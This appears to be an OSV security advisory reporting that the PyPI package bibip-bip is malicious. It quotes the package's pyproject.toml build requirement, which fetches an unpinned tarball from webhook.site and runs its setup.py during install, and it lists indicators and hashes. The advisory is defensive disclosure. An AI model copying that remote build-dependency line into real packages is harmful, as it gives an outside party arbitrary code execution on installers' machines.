MAL-2026-5649

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/bibip-bip/MAL-2026-5649.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5649
Published
2026-06-11T12:02:00Z
Modified
2026-06-12T20:01:59Z
Summary
Malicious code in bibip-bip (PyPI)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (c2b153c90d83d4653660dd79a5a0935af85bd804fd98163c42995403bca240a6)

pyproject.toml declares a PEP 517 build requirement that points to an arbitrary tarball hosted on webhook.site, an anonymous request-inspection / file-hosting service: requires = ["setuptools>=64", "aliga-raison @ https://webhook.site/d5367f1c-8bca-4d14-83d3-b2cbbce825eb/pypi/aliga-raison.tar.gz"]. During pip install (or pip wheel / sdist build) pip resolves this direct-URL requirement into the build isolation environment and executes the tarball's setup.py, giving the URL owner arbitrary code execution on the installer's machine. The URL is unpinned (no hash), is not on the publisher's domain, and webhook.site content is fully attacker-controlled and mutable. The package's advertised purpose ('simple hello package') has no legitimate need for an external build dependency, let alone one fetched from an anonymous host.

Source: kam193 (e9fe54b6f6746a12583461c774f3641de4be0a30042b0349c90b56a25413aa44)

Package tests exploitation via externally-hosted dependencies


Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.

Campaign: GENERIC-standard-pypi-install-pentest

Reasons (based on the campaign):

  • The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.

  • The package overrides the install command in setup.py to execute malicious code during installation.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "pypi/GENERIC-standard-pypi-install-pentest/bibip-bip",
            "import_time": "2026-06-11T13:27:23.838571258Z",
            "modified_time": "2026-06-11T12:02:00.759382Z",
            "sha256": "e9fe54b6f6746a12583461c774f3641de4be0a30042b0349c90b56a25413aa44",
            "source": "kam193",
            "versions": [
                "0.1.0"
            ]
        },
        {
            "id": "IN-MAL-2026-005824",
            "import_time": "2026-06-12T19:43:37.218164768Z",
            "modified_time": "2026-06-12T19:02:42Z",
            "sha256": "037413514e59e8eaf4c4ca68615bce9af120aed9f8742cf1992c6b8cd38d4941",
            "source": "amazon-inspector",
            "versions": [
                "0.1.0"
            ]
        },
        {
            "id": "IN-MAL-2026-005823",
            "import_time": "2026-06-12T19:43:37.067730698Z",
            "modified_time": "2026-06-12T19:02:42Z",
            "sha256": "c2b153c90d83d4653660dd79a5a0935af85bd804fd98163c42995403bca240a6",
            "source": "amazon-inspector",
            "versions": [
                "0.1.0"
            ]
        }
    ]
}
References
Credits

Affected packages

PyPI / bibip-bip

Package

Affected ranges

Affected versions

0.*
0.1.0

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
indicators
{
    "domains": [
        "webhook.site"
    ],
    "evidence_files": [
        {
            "path": "pyproject.toml",
            "sha256": "be45704f688cbd258d7589566a3fb51bca8851354f0a14d166cc8ab213287cae",
            "tlsh": "3ee0263397166e156ad915c4a56d111aec72b05078c8804cb6cf864475c94eadee2d74"
        }
    ],
    "package_integrity": [
        {
            "filename": "bibip_bip-0.1.0.tar.gz",
            "hashes": {
                "blake2b_256": "98e14110b27f30a05219332a5b3d6020887169d62fb8d31e407c66feac926477",
                "md5": "b3f5b4ce570280ee1408b254255610cc",
                "sha256": "244fa3d15183140e0a14aac9f3f47ecab02ba1dd61ccf6a8af08a29f6a7af5a4"
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/bibip-bip/MAL-2026-5649.json"